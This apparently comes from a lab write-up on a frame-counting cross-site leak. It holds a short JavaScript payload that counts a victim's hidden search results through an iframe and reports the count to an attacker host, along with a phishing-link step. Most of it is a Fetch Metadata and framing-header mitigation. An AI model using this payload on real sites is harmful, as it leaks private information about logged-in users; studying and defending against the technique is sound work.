Attack 2: Frame Counting
The payload loads the victim's document search in an invisible iframe and reads iframe.contentWindow.length, which the HTML spec leaves readable across origins, to count the matching documents.
How it works
Payload running in Alice's browser at https://attacker.ssc-primesec.de:
const f = document.createElement('iframe')
f.src = 'https://intravault.ssc-primesec.de/documents/search?q=salary'
f.onload = () => {
  const count = f.contentWindow.length // window.length is cross-origin accessible!
  report({ query: 'salary', count })   // sent back here via SSE
}
The victim's search page renders N hidden <iframe>s (one per result), so count = N matching documents.
Phishing link (send this to Alice):
https://attacker.ssc-primesec.de/payload/2
Alice must be logged in at intravault.test:3000.
Protected: all counts = 0 (the login page has no iframes). Vulnerable: real counts leaked.
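A server-side mitigation for the search endpoint, added here as an example and not part of the lab's own code: a Fetch Metadata isolation check that refuses to render results when the page is being embedded, plus framing headers for browsers that do not send Sec-Fetch-* headers. The request shape (a plain object of lower-cased header names) and the 403 body are assumptions; note that if ssc-primesec.de is not a public suffix, attacker.ssc-primesec.de is same-site with intravault.ssc-primesec.de, so SameSite cookies alone would not stop the iframe load, which is why the policy below treats same-site embeds as untrusted.

```javascript
// Added example (not the lab's code): Fetch Metadata isolation for /documents/search.
// Assumption: `headers` is an object whose keys are lower-cased request header names.
const SEARCH_RESPONSE_HEADERS = {
  // Belt and braces for browsers without Fetch Metadata: refuse framing outright,
  // so an embedding iframe's contentWindow.length is always 0.
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "frame-ancestors 'none'",
  'Cross-Origin-Opener-Policy': 'same-origin',
  'Vary': 'Sec-Fetch-Site, Sec-Fetch-Dest, Sec-Fetch-Mode',
  'Cache-Control': 'no-store',
};

// True when the search page may be rendered with results for this request.
function isAllowedSearchRequest(headers) {
  const site = headers['sec-fetch-site'];
  const dest = headers['sec-fetch-dest'];
  const mode = headers['sec-fetch-mode'];
  // Older browsers send no Sec-Fetch-* headers: let them through and rely on the
  // framing headers above to keep the page out of a cross-origin iframe.
  if (site === undefined) return true;
  // Requests from the app's own origin, or typed/bookmarked URLs, are trusted.
  if (site === 'same-origin' || site === 'none') return true;
  // Anything else, including a sibling subdomain (which counts as same-site), may
  // only arrive as a top-level navigation. Embedding as <iframe> (dest "iframe",
  // or "nested-document" in older Chrome) and CORS/no-cors fetches are refused.
  return mode === 'navigate' && dest === 'document';
}

// Serve results, or a minimal 403 page that itself contains no frames, so a
// frame-counting payload observes 0 whether or not Alice is logged in.
function handleSearchRequest(headers) {
  const out = { ...SEARCH_RESPONSE_HEADERS };
  if (!isAllowedSearchRequest(headers)) {
    // Worth logging: a refused embed of an authenticated page is a detection signal.
    return { status: 403, headers: out, reason: 'refused-embed', body: '<!doctype html><p>Forbidden</p>' };
  }
  return { status: 200, headers: out, reason: 'ok', body: null }; // real handler renders results
}

// Constructed requests modelled on the payload above and on legitimate use.
const CONSTRUCTED_REQUESTS = {
  attackerIframe: { 'sec-fetch-site': 'same-site', 'sec-fetch-dest': 'iframe', 'sec-fetch-mode': 'navigate' },
  crossSiteIframe: { 'sec-fetch-site': 'cross-site', 'sec-fetch-dest': 'iframe', 'sec-fetch-mode': 'navigate' },
  crossSiteFetch: { 'sec-fetch-site': 'cross-site', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors' },
  userTypedUrl: { 'sec-fetch-site': 'none', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate' },
  inAppSearch: { 'sec-fetch-site': 'same-origin', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate' },
  legacyBrowser: {},
};
```

Run the check before the search handler and before any session lookup, so the refused path never touches document data.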